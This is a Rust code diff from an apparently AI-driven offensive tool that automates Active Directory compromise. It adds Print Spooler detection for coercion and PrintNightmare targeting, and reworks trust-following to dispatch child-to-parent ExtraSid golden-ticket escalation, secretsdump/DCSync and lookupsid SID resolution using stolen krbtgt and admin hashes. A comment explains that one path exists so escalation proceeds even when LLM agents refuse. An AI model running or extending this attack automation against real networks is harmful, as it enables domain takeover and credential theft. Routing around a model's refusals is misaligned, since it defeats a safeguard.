assert_eq!(domain, ""); + } + + #[test] + fn smb_enum_payload_structure() { + let payload = serde_json::json!({ + "technique": "authenticated_share_enumeration", + "target_ip": "192.168.58.22", + "hostname": "srv01.contoso.local", + "domain": "contoso.local", + "credential": { + "username": "admin", + "password": "P@ssw0rd!", + "domain": "contoso.local", + }, + }); + assert_eq!(payload["technique"], "authenticated_share_enumeration"); + assert_eq!(payload["target_ip"], "192.168.58.22"); + assert_eq!(payload["credential"]["username"], "admin"); + } + + #[test] + fn credential_domain_matching_case_insensitive() { + let domain = "contoso.local"; + let cred_domain = "CONTOSO.LOCAL"; + assert_eq!(cred_domain.to_lowercase(), domain.to_lowercase()); + } + + #[test] + fn credential_domain_matching_empty_skips() { + let domain = "".to_string(); + let cred_domain = "contoso.local"; + let matches = !domain.is_empty() && cred_domain.to_lowercase() == domain.to_lowercase(); + assert!(!matches); + } + + #[test] + fn smb_enum_work_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = SmbEnumWork { + dedup_key: "smb_auth_enum:192.168.58.22".into(), + target_ip: "192.168.58.22".into(), + hostname: "srv01.contoso.local".into(), + domain: "contoso.local".into(), + credential: cred, + }; + assert_eq!(work.target_ip, "192.168.58.22"); + assert_eq!(work.credential.username, "admin"); + } + + #[test] + fn empty_services_no_smb() { + let services: Vec = vec![]; + let has_smb = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("445") || sl.contains("smb") || sl.contains("cifs") + }); + assert!(!has_smb); + } +} diff --git a/ares-cli/src/orchestrator/automation/spooler_check.rs b/ares-cli/src/orchestrator/automation/spooler_check.rs new file mode 100644 index 00000000..4815cfb2 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/spooler_check.rs @@ -0,0 +1,376 @@ +//! auto_spooler_check -- detect Print Spooler service on discovered hosts. +//! +//! The Print Spooler service (MS-RPRN) is a common coercion vector: if running, +//! PrinterBug (SpoolSample) can force the machine to authenticate to an attacker +//! listener. It's also a prerequisite for PrintNightmare (CVE-2021-1675). +//! +//! This is a recon bridge: it dispatches a check per host and registers +//! `spooler_enabled` vulnerabilities that downstream coercion/CVE modules target. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +fn collect_spooler_work(state: &StateInner) -> Vec { + if state.credentials.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + for host in &state.hosts { + let dedup_key = format!("spooler:{}", host.ip); + if state.is_processed(DEDUP_SPOOLER_CHECK, &dedup_key) { + continue; + } + + let domain = host + .hostname + .find('.') + .map(|i| host.hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + + let cred = state + .credentials + .iter() + .find(|c| !domain.is_empty() && c.domain.to_lowercase() == domain) + .or_else(|| state.credentials.first()) + .cloned(); + + let cred = match cred { + Some(c) => c, + None => continue, + }; + + items.push(SpoolerWork { + dedup_key, + target_ip: host.ip.clone(), + hostname: host.hostname.clone(), + domain, + credential: cred, + }); + } + + items +} + +/// Checks discovered hosts for Print Spooler service availability. +/// Interval: 45s. +pub async fn auto_spooler_check(dispatcher: Arc, mut shutdown: watch::Receiver) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("spooler_check") { + continue; + } + + let work: Vec = { + let state = dispatcher.state.read().await; + collect_spooler_work(&state) + }; + + for item in work { + let payload = json!({ + "technique": "spooler_check", + "target_ip": item.target_ip, + "hostname": item.hostname, + "domain": item.domain, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }); + + let priority = dispatcher.effective_priority("spooler_check"); + match dispatcher + .throttled_submit("recon", "recon", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + target = %item.target_ip, + hostname = %item.hostname, + "Print Spooler check dispatched" + ); + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_SPOOLER_CHECK, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_SPOOLER_CHECK, &item.dedup_key) + .await; + + // Register spooler_enabled vulnerability proactively so it + // appears in reports. The agent's report_finding callback + // only logs — this ensures the finding is durable. + let vuln = ares_core::models::VulnerabilityInfo { + vuln_id: format!("spooler_{}", item.target_ip.replace('.', "_")), + vuln_type: "spooler_enabled".to_string(), + target: item.target_ip.clone(), + discovered_by: "auto_spooler_check".to_string(), + discovered_at: chrono::Utc::now(), + details: { + let mut d = std::collections::HashMap::new(); + d.insert("target_ip".to_string(), json!(item.target_ip)); + d.insert("hostname".to_string(), json!(item.hostname)); + d.insert("domain".to_string(), json!(item.domain)); + d.insert( + "description".to_string(), + json!("Print Spooler service (MS-RPRN) is running. Enables PrinterBug coercion and is a prerequisite for PrintNightmare (CVE-2021-1675)."), + ); + d + }, + recommended_agent: "privesc".to_string(), + priority: dispatcher.effective_priority("spooler_check"), + }; + + match dispatcher + .state + .publish_vulnerability_with_strategy( + &dispatcher.queue, + vuln, + Some(&dispatcher.config.strategy), + ) + .await + { + Ok(true) => { + info!( + target = %item.target_ip, + hostname = %item.hostname, + "Print Spooler enabled — vulnerability registered" + ); + } + Ok(false) => {} + Err(e) => { + warn!(err = %e, target = %item.target_ip, "Failed to publish spooler vulnerability"); + } + } + } + Ok(None) => { + debug!(target = %item.target_ip, "Spooler check deferred"); + } + Err(e) => { + warn!(err = %e, target = %item.target_ip, "Failed to dispatch spooler check"); + } + } + } + } +} + +struct SpoolerWork { + dedup_key: String, + target_ip: String, + hostname: String, + domain: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::orchestrator::state::StateInner; + + fn make_credential( + username: &str, + password: &str, + domain: &str, + ) -> ares_core::models::Credential { + ares_core::models::Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + fn make_host(ip: &str, hostname: &str) -> ares_core::models::Host { + ares_core::models::Host { + ip: ip.to_string(), + hostname: hostname.to_string(), + os: String::new(), + roles: Vec::new(), + services: Vec::new(), + is_dc: false, + owned: false, + } + } + + #[test] + fn dedup_key_format() { + let key = format!("spooler:{}", "192.168.58.22"); + assert_eq!(key, "spooler:192.168.58.22"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_SPOOLER_CHECK, "spooler_check"); + } + + #[test] + fn domain_from_hostname() { + let hostname = "srv01.contoso.local"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, "contoso.local"); + } + + #[test] + fn collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_spooler_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local")); + let work = collect_spooler_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_single_host_with_credential_produces_work() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local")); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_spooler_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_ip, "192.168.58.22"); + assert_eq!(work[0].hostname, "srv01.contoso.local"); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dedup_key, "spooler:192.168.58.22"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_multiple_hosts_produces_work_for_each() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local")); + state + .hosts + .push(make_host("192.168.58.23", "srv02.contoso.local")); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_spooler_work(&state); + assert_eq!(work.len(), 2); + let ips: Vec<&str> = work.iter().map(|w| w.target_ip.as_str()).collect(); + assert!(ips.contains(&"192.168.58.22")); + assert!(ips.contains(&"192.168.58.23")); + } + + #[test] + fn collect_dedup_skips_already_processed_host() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local")); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_SPOOLER_CHECK, "spooler:192.168.58.22".into()); + let work = collect_spooler_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_dedup_skips_processed_keeps_unprocessed() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local")); + state + .hosts + .push(make_host("192.168.58.23", "srv02.contoso.local")); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_SPOOLER_CHECK, "spooler:192.168.58.22".into()); + let work = collect_spooler_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_ip, "192.168.58.23"); + } + + #[test] + fn collect_prefers_same_domain_credential() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local")); + state + .credentials + .push(make_credential("fabuser", "Fab!Pass1", "fabrikam.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_spooler_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "admin"); + assert_eq!(work[0].credential.domain, "contoso.local"); + } + + #[test] + fn collect_falls_back_to_first_credential() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local")); + // Only fabrikam credential available for contoso host + state + .credentials + .push(make_credential("fabuser", "Fab!Pass1", "fabrikam.local")); // pragma: allowlist secret + let work = collect_spooler_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "fabuser"); + } + + #[test] + fn collect_host_without_fqdn_gets_empty_domain() { + let mut state = StateInner::new("test-op".into()); + state.hosts.push(make_host("192.168.58.22", "srv01")); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_spooler_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, ""); + // Falls back to first credential since domain is empty + assert_eq!(work[0].credential.username, "admin"); + } +} diff --git a/ares-cli/src/orchestrator/automation/trust.rs b/ares-cli/src/orchestrator/automation/trust.rs index 598871ca..b6582e87 100644 --- a/ares-cli/src/orchestrator/automation/trust.rs +++ b/ares-cli/src/orchestrator/automation/trust.rs @@ -9,6 +9,7 @@ //! 3. **Trust follow**: When a trust account hash is found, dispatch inter-realm //! ticket creation and secretsdump against the foreign DC. +use std::collections::HashSet; use std::sync::Arc; use std::time::Duration; @@ -16,6 +17,8 @@ use serde_json::json; use tokio::sync::watch; use tracing::{debug, info, warn}; +use ares_llm::ToolCall; + use crate::orchestrator::dispatcher::Dispatcher; use crate::orchestrator::state::*; @@ -42,6 +45,128 @@ fn trust_account_name(flat_name: &str) -> String { format!("{}$", flat_name.to_uppercase()) } +/// Returns true when source and target are in different forests +/// (neither is a parent or child of the other, and they are not equal). +/// +/// Inter-forest trusts are subject to SID filtering on the target DC, which +/// strips ExtraSid claims with RID < 1000 (Enterprise Admins, Domain Admins, +/// Administrator). The inter-realm TGT authenticates but the privileged claim +/// is silently dropped — DCSync against the target DC then fails with +/// `rpc_s_access_denied`. This helper distinguishes the doomed path from +/// child→parent escalation (intra-forest), which is exploitable. +fn is_inter_forest(source: &str, target: &str) -> bool { + let s = source.to_lowercase(); + let t = target.to_lowercase(); + if s.is_empty() || t.is_empty() || s == t { + return false; + } + if s.ends_with(&format!(".{t}")) || t.ends_with(&format!(".{s}")) { + return false; + } + true +} + +/// Returns true if the trust source→target is inter-forest with SID filtering +/// active — meaning `forge_inter_realm_and_dump` will be rejected at DCSync +/// regardless of trust key validity. Caller should suppress the doomed +/// dispatch and accelerate cross-forest fallback paths instead. +/// +/// Decision tree: +/// - Intra-forest (child↔parent or same domain): false (raise_child handles it) +/// - Explicit `TrustInfo` with `is_cross_forest()` and `sid_filtering=true`: true +/// - Explicit `TrustInfo` with `is_cross_forest()` and `sid_filtering=false`: +/// false (someone disabled SID filtering — try the forge) +/// - No `TrustInfo` but the names are inter-forest: false (try the forge — +/// missing metadata means we can't be sure SID filtering is on, and the +/// ~30s cost of an unnecessary attempt is cheaper than silently dropping +/// a valid attack path on a misconfigured trust) +fn is_filtered_inter_forest_trust(state: &StateInner, source: &str, target: &str) -> bool { + if !is_inter_forest(source, target) { + return false; + } + let target_l = target.to_lowercase(); + // Look up only the target's metadata. `trusted_domains` is keyed by the + // foreign-side domain name in each enumeration result, so the entry for + // `target_l` describes the source→target relationship. Falling back to + // the source key returns *some other* trust the source happens to have + // (e.g. north→sevenkingdoms parent_child stored under "sevenkingdoms.local" + // when we query sevenkingdoms→essos), which would wrongly classify the + // unknown cross-forest path as intra-forest and let the doomed forge fire. + if let Some(t) = state.trusted_domains.get(&target_l) { + if t.is_cross_forest() { + return t.sid_filtering; + } + // Trust enumeration disagrees with name-based heuristic — trust the + // explicit metadata (e.g. unusual same-forest cross-DNS-suffix setup). + return false; + } + // No metadata — try the forge. False positives (SID filtering actually on) + // cost ~30s for a doomed DCSync attempt; false negatives (refusing a valid + // attack on a misconfigured trust where SID filtering is off) cost the + // entire foreign domain. Prefer the cheaper failure mode. + false +} + +/// Clear cross-forest fallback dedup keys for `target_domain` so the next +/// tick of `auto_cross_forest_enum`, `auto_foreign_group_enum`, and +/// `auto_acl_discovery` re-fires against the foreign forest with current +/// credentials. Called when a doomed forest_trust_escalation is suppressed +/// — the trust hash extraction usually populates new state (DC IPs, SIDs) +/// that should kick the fallbacks back into action. +async fn wake_cross_forest_fallbacks(dispatcher: &Dispatcher, target_domain: &str) { + let target_l = target_domain.to_lowercase(); + // (set_name, prefix) pairs — must stay in sync with the auto_*_enum + // dedup-key formats in their respective modules. + let mut prefixes: Vec<(&str, String)> = vec![ + (DEDUP_CROSS_FOREST_ENUM, format!("xforest:{target_l}:")), + ( + DEDUP_FOREIGN_GROUP_ENUM, + format!("foreign_group:{target_l}"), + ), + (DEDUP_ACL_DISCOVERY, format!("acl_disc:{target_l}:")), + ]; + + // ADCS dedup keys are `{host}:cred:{user@dom}` / `{host}:hash:{user@dom}`, + // keyed on the CA host (IP or hostname) — not the target domain. So for + // each known host that belongs to `target_domain`, add a `{host}:` prefix. + // This lets a freshly-acquired cross-forest credential re-attempt + // certipy_find against an essos CA that was previously locked by a wrong + // initial cred. + { + let s = dispatcher.state.read().await; + let suffix = format!(".{target_l}"); + for h in s.hosts.iter() { + let hostname = h.hostname.to_lowercase(); + let belongs = + !hostname.is_empty() && (hostname == target_l || hostname.ends_with(&suffix)); + if !belongs { + continue; + } + if !h.ip.is_empty() { + prefixes.push((DEDUP_ADCS_SERVERS, format!("{}:", h.ip))); + } + prefixes.push((DEDUP_ADCS_SERVERS, format!("{hostname}:"))); + } + } + + let cleared: Vec<(&str, Vec)> = { + let mut s = dispatcher.state.write().await; + prefixes + .iter() + .map(|(set, prefix)| (*set, s.unmark_processed_by_prefix(set, prefix))) + .filter(|(_, v)| !v.is_empty()) + .collect() + }; + for (set, keys) in cleared { + for key in keys { + let _ = dispatcher + .state + .unpersist_dedup(&dispatcher.queue, set, &key) + .await; + } + } +} + /// Check if a credential domain matches a target domain (exact, child, or parent). fn is_domain_related(cred_domain: &str, target_domain: &str) -> bool { let cd = cred_domain.to_lowercase(); @@ -81,25 +206,38 @@ pub async fn auto_trust_follow(dispatcher: Arc, mut shutdown: watch: // Two dedup keys per domain: // trust_enum: — password-based attempt // trust_enum_hash: — hash-based retry (for dominated domains) - let enum_work: Vec<(String, String, String)> = state + // + // Iterate the union of `domain_controllers` keys and + // `dominated_domains`. The latter covers the case where a + // domain was compromised (e.g. via raise_child to the parent) + // but its DC was never explicitly seeded into + // `domain_controllers` — without this, parent-DC trust + // enumeration would never fire and cross-forest trusts would + // remain undiscovered. + let mut candidate_domains: HashSet = state .domain_controllers + .keys() + .map(|d| d.to_lowercase()) + .collect(); + for d in state.dominated_domains.iter() { + candidate_domains.insert(d.to_lowercase()); + } + let enum_work: Vec<(String, String, String)> = candidate_domains .iter() - .filter(|(domain, _)| { - let key = trust_enum_dedup_key(domain, false); - let hash_key = trust_enum_dedup_key(domain, true); - !state.is_processed(DEDUP_TRUST_FOLLOW, &key) - || (!state.is_processed(DEDUP_TRUST_FOLLOW, &hash_key) - && state.dominated_domains.contains(&domain.to_lowercase())) - }) - .map(|(domain, dc_ip)| { - // Use hash_key if password-based was already tried + .filter_map(|domain| { + let dc_ip = state.resolve_dc_ip(domain)?; let pw_key = trust_enum_dedup_key(domain, false); - let key = if state.is_processed(DEDUP_TRUST_FOLLOW, &pw_key) { - trust_enum_dedup_key(domain, true) - } else { - pw_key - }; - (key, domain.clone(), dc_ip.clone()) + let hash_key = trust_enum_dedup_key(domain, true); + let pw_done = state.is_processed(DEDUP_TRUST_FOLLOW, &pw_key); + let hash_done = state.is_processed(DEDUP_TRUST_FOLLOW, &hash_key); + let dominated = state.dominated_domains.contains(domain); + // Skip if password attempt is done AND (no hash retry + // applies, or hash retry already done). + if pw_done && (!dominated || hash_done) { + return None; + } + let key = if pw_done { hash_key } else { pw_key }; + Some((key, domain.clone(), dc_ip)) }) .collect(); drop(state); @@ -164,39 +302,152 @@ pub async fn auto_trust_follow(dispatcher: Arc, mut shutdown: watch: }; if let Some(cred_json) = cred_payload { - let payload = json!({ - "techniques": ["enumerate_domain_trusts"], - "target_ip": dc_ip, + // Direct tool dispatch — bypass the LLM agent loop. + // The recon prompt template did not surface + // `credential.hash` (only password), so LLM-driven trust + // enumeration with hash auth would render an empty + // password and fail with LDAP 52e. The orchestrator + // already owns every input here; deliver them directly + // to enumerate_domain_trusts via dispatch_tool. + let mut args = json!({ + "target": dc_ip, "domain": domain, - "credential": cred_json, + "username": cred_json + .get("username") + .and_then(|v| v.as_str()) + .unwrap_or(""), }); + if let Some(p) = cred_json + .get("password") + .and_then(|v| v.as_str()) + .filter(|s| !s.is_empty()) + { + args["password"] = json!(p); + } + if let Some(h) = cred_json + .get("hash") + .and_then(|v| v.as_str()) + .filter(|s| !s.is_empty()) + { + args["hash"] = json!(h); + } + if let Some(bd) = cred_json + .get("domain") + .and_then(|v| v.as_str()) + .filter(|s| !s.is_empty() && !s.eq_ignore_ascii_case(&domain)) + { + args["bind_domain"] = json!(bd); + } - match dispatcher - .throttled_submit("recon", "recon", payload, 3) + let call = ToolCall { + id: format!("trust_enum_{}", uuid::Uuid::new_v4().simple()), + name: "enumerate_domain_trusts".to_string(), + arguments: args, + }; + let task_id = format!( + "trust_enum_{}", + &uuid::Uuid::new_v4().simple().to_string()[..12] + ); + + // Mark dedup BEFORE spawn so the next 30s tick doesn't + // re-dispatch while enumeration is in flight. + dispatcher + .state + .write() .await - { - Ok(Some(task_id)) => { - info!( - task_id = %task_id, - domain = %domain, - auth = auth_method, - "Trust enumeration dispatched" - ); - dispatcher + .mark_processed(DEDUP_TRUST_FOLLOW, key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_TRUST_FOLLOW, &key) + .await; + + info!( + task_id = %task_id, + domain = %domain, + dc_ip = %dc_ip, + auth = auth_method, + "Dispatching enumerate_domain_trusts (direct tool, no LLM)" + ); + + let dispatcher_bg = dispatcher.clone(); + let domain_bg = domain.clone(); + let key_bg = key.clone(); + let auth_method_bg = auth_method.to_string(); + tokio::spawn(async move { + let result = dispatcher_bg + .llm_runner + .tool_dispatcher() + .dispatch_tool("recon", &task_id, &call) + .await; + // Failure handling depends on which auth attempt + // just failed: + // + // - password attempt: leave the dedup mark in place + // so the next 30s tick sees `pw_done=true` and + // escalates to the hash-key path (gated on the + // domain being in `dominated_domains`). Clearing + // the mark would loop forever on the same wrong + // sibling-domain credential. + // - hash attempt: clear so a future tick can retry + // if a fresh hash becomes available. + let clear_dedup = || async { + dispatcher_bg .state .write() .await - .mark_processed(DEDUP_TRUST_FOLLOW, key.clone()); - let _ = dispatcher + .unmark_processed(DEDUP_TRUST_FOLLOW, &key_bg); + let _ = dispatcher_bg .state - .persist_dedup(&dispatcher.queue, DEDUP_TRUST_FOLLOW, &key) + .unpersist_dedup( + &dispatcher_bg.queue, + DEDUP_TRUST_FOLLOW, + &key_bg, + ) .await; + }; + let on_failure = || async { + if auth_method_bg == "password" { + // Mark stays — escalation to hash retry on next tick. + } else { + clear_dedup().await; + } + }; + match result { + Ok(exec_result) => { + if let Some(err) = exec_result.error.as_ref() { + warn!( + err = %err, + domain = %domain_bg, + auth = %auth_method_bg, + "enumerate_domain_trusts returned error" + ); + on_failure().await; + return; + } + let trust_count = exec_result + .discoveries + .as_ref() + .and_then(|d| d.get("trusted_domains")) + .and_then(|t| t.as_array()) + .map(|a| a.len()) + .unwrap_or(0); + info!( + domain = %domain_bg, + trust_count = trust_count, + "enumerate_domain_trusts completed" + ); + } + Err(e) => { + warn!( + err = %e, + domain = %domain_bg, + auth = %auth_method_bg, + "enumerate_domain_trusts dispatch errored" + ); + on_failure().await; + } } - Ok(None) => { - debug!(domain = %domain, "Trust enum throttled — deferred"); - } - Err(e) => warn!(err = %e, "Failed to dispatch trust enumeration"), - } + }); } } } @@ -204,47 +455,91 @@ pub async fn auto_trust_follow(dispatcher: Arc, mut shutdown: watch: // Child-to-parent escalation (ExtraSid via raiseChild) // - // When a parent_child trust is discovered and the child domain is dominated, - // dispatch a child_to_parent exploit task. The LLM prompt offers raiseChild - // (automated) and manual ExtraSid golden ticket as alternatives. + // Dispatches when a child domain is dominated and its parent FQDN is + // known. We derive the parent FQDN by stripping the leftmost label of + // the dominated child (always valid intra-forest — child FQDN is + // `{label}.{parent_fqdn}` by AD construction), then ALSO union with + // any explicit parent_child trusts discovered via LDAP enumeration. + // + // The intra-forest derivation lets us fire immediately on child DA, + // bypassing the trust enumeration round-trip — without it we'd block + // until `trusted_domains` was populated, which sometimes never + // happens (LLM refusal, network, throttle starvation). { let state = dispatcher.state.read().await; - if state.has_domain_admin && !state.trusted_domains.is_empty() { - let child_work: Vec<(String, String, String, String)> = state - .trusted_domains - .values() - .filter(|trust| trust.is_parent_child()) - .filter_map(|trust| { - let parent_domain = &trust.domain; + if state.has_domain_admin { + let mut child_work: Vec<(String, String, String, String)> = Vec::new(); + + // Path A: derived intra-forest. For each dominated child (FQDN + // with 3+ labels), the parent is `labels[1..].join(".")`. + for child_domain in state.dominated_domains.iter() { + let cd_lower = child_domain.to_lowercase(); + let labels: Vec<&str> = cd_lower.split('.').collect(); + if labels.len() < 3 { + continue; + } + let parent_domain = labels[1..].join("."); + if parent_domain.is_empty() || !parent_domain.contains('.') { + continue; + } + if state.dominated_domains.contains(&parent_domain) { + continue; + } + // Require parent DC IP resolvable (via domain_controllers + // or hosts table) so secretsdump has a target IP. + let parent_dc_ip = match state.resolve_dc_ip(&parent_domain) { + Some(ip) => ip, + None => continue, + }; + let key = format!("raise_child:{}", cd_lower); + if state.is_processed(DEDUP_TRUST_FOLLOW, &key) { + continue; + } + let child_dc_ip = match state.domain_controllers.get(&cd_lower) { + Some(ip) => ip.clone(), + None => continue, + }; + let _ = parent_dc_ip; // resolved later under fresh read lock + child_work.push((key, child_domain.clone(), parent_domain, child_dc_ip)); + } - // Skip if parent is already dominated + // Path B: explicit parent_child trusts from LDAP enumeration. + // Skip duplicates of Path A (same dedup key). + if !state.trusted_domains.is_empty() { + for trust in state.trusted_domains.values() { + if !trust.is_parent_child() { + continue; + } + let parent_domain = trust.domain.clone(); if state .dominated_domains .contains(&parent_domain.to_lowercase()) { - return None; + continue; } - - // Find a dominated child domain for this parent - // (child FQDN ends with .{parent}) - let child_domain = state.dominated_domains.iter().find(|d| { + let child_domain = match state.dominated_domains.iter().find(|d| { d.to_lowercase() .ends_with(&format!(".{}", parent_domain.to_lowercase())) - })?; - + }) { + Some(d) => d.clone(), + None => continue, + }; let key = format!("raise_child:{}", child_domain.to_lowercase()); if state.is_processed(DEDUP_TRUST_FOLLOW, &key) { - return None; + continue; } + if child_work.iter().any(|(k, _, _, _)| k == &key) { + continue; + } + let child_dc_ip = + match state.domain_controllers.get(&child_domain.to_lowercase()) { + Some(ip) => ip.clone(), + None => continue, + }; + child_work.push((key, child_domain, parent_domain, child_dc_ip)); + } + } - let dc_ip = state - .domain_controllers - .get(&child_domain.to_lowercase()) - .cloned()?; - - Some((key, child_domain.clone(), parent_domain.clone(), dc_ip)) - }) - .collect(); drop(state); for (key, child_domain, parent_domain, dc_ip) in child_work { @@ -347,13 +642,24 @@ pub async fn auto_trust_follow(dispatcher: Arc, mut shutdown: watch: // Dispatch child-to-parent exploit task. The LLM prompt // offers raiseChild (automated) and manual ExtraSid golden // ticket creation as alternatives. + // `dc_ip` is the child DC (for trust key extraction). + // `target` should be the parent DC (for secretsdump after forging ticket). + // Use resolve_dc_ip so the hosts table fills in when + // domain_controllers lacks the parent — falls back to the + // child DC only as a last resort (DCSync can succeed + // against any writable DC in the parent domain). + let parent_dc_ip = { + let s = dispatcher.state.read().await; + s.resolve_dc_ip(&parent_domain) + .unwrap_or_else(|| dc_ip.clone()) + }; let mut payload = json!({ "technique": "create_inter_realm_ticket", "vuln_type": "child_to_parent", "domain": child_domain, "trusted_domain": parent_domain, "target_domain": parent_domain, - "target": &dc_ip, + "target": &parent_dc_ip, "dc_ip": dc_ip, "vuln_id": &vuln_id, }); @@ -363,50 +669,363 @@ pub async fn auto_trust_follow(dispatcher: Arc, mut shutdown: watch: payload[k] = v.clone(); } } - // Add domain SIDs if already resolved - { + // Add domain SIDs and child krbtgt (for ExtraSid via child + // krbtgt — preferred path, no inter-realm trust key needed). + // + // The ExtraSid attack requires the PARENT forest SID (RID 519 + // = Enterprise Admins). If we ship the child SID by mistake, + // the parent KDC rejects the ticket with KDC_ERR_PREAUTH_FAILED + // because the embedded SID doesn't resolve to a real EA group. + // So if the parent SID isn't cached, resolve it via lookupsid + // against the parent DC using child admin creds (cross-trust + // SAMR works) BEFORE dispatching the exploit task. Defer the + // dispatch (no dedup mark) when resolution fails so the next + // 30s tick can retry once host scans / DC enumeration progress. + let parent_lower = parent_domain.to_lowercase(); + let cd_lower = child_domain.to_lowercase(); + let ( + mut have_target_sid, + mut have_source_sid, + child_admin_cred, + child_admin_hash, + child_dc_ip, + ) = { let s = dispatcher.state.read().await; - if let Some(sid) = s.domain_sids.get(&child_domain.to_lowercase()) { + if let Some(sid) = s.domain_sids.get(&cd_lower) { payload["source_sid"] = json!(sid); } - if let Some(sid) = s.domain_sids.get(&parent_domain.to_lowercase()) { + if let Some(sid) = s.domain_sids.get(&parent_lower) { payload["target_sid"] = json!(sid); } - } + if let Some(child_krbtgt) = s.hashes.iter().find(|h| { + h.username.eq_ignore_ascii_case("krbtgt") + && h.domain.to_lowercase() == cd_lower + && h.hash_type.to_uppercase() == "NTLM" + }) { + payload["child_krbtgt_hash"] = json!(child_krbtgt.hash_value); + } + let admin_cred = s + .credentials + .iter() + .find(|c| { + c.is_admin + && !c.password.is_empty() + && c.domain.to_lowercase() == cd_lower + }) + .cloned(); + let admin_hash = s + .hashes + .iter() + .find(|h| { + h.username.to_lowercase() == "administrator" + && h.domain.to_lowercase() == cd_lower + && h.hash_type.to_uppercase() == "NTLM" + }) + .cloned(); + let child_dc = s.resolve_dc_ip(&child_domain); + ( + s.domain_sids.contains_key(&parent_lower), + s.domain_sids.contains_key(&cd_lower), + admin_cred, + admin_hash, + child_dc, + ) + }; - match dispatcher - .throttled_submit("exploit", "privesc", payload, 1) + if !have_target_sid { + if let Some((sid, admin_name)) = super::golden_ticket::resolve_domain_sid( + &parent_domain, + &parent_dc_ip, + child_admin_cred.as_ref(), + child_admin_hash.as_ref(), + ) .await - { - Ok(Some(task_id)) => { + { info!( - task_id = %task_id, + parent_domain = %parent_domain, + sid = %sid, + "Resolved parent domain SID via lookupsid for child-to-parent ExtraSid" + ); + let op_id = { dispatcher.state.read().await.operation_id.clone() }; + let reader = ares_core::state::RedisStateReader::new(op_id); + let mut conn = dispatcher.queue.connection(); + let _ = reader.set_domain_sid(&mut conn, &parent_lower, &sid).await; + if let Some(ref name) = admin_name { + let _ = reader.set_admin_name(&mut conn, &parent_lower, name).await; + } + { + let mut state = dispatcher.state.write().await; + state.domain_sids.insert(parent_lower.clone(), sid.clone()); + if let Some(ref name) = admin_name { + state.admin_names.insert(parent_lower.clone(), name.clone()); + } + } + payload["target_sid"] = json!(sid); + have_target_sid = true; + } else { + warn!( child_domain = %child_domain, parent_domain = %parent_domain, - auth = auth_method, - "Child-to-parent escalation dispatched" + parent_dc_ip = %parent_dc_ip, + "Could not resolve parent SID — deferring child-to-parent dispatch" ); - let _ = dispatcher - .state - .mark_exploited(&dispatcher.queue, &vuln_id) - .await; - dispatcher - .state - .write() - .await - .mark_processed(DEDUP_TRUST_FOLLOW, key.clone()); - let _ = dispatcher - .state - .persist_dedup(&dispatcher.queue, DEDUP_TRUST_FOLLOW, &key) - .await; - } - 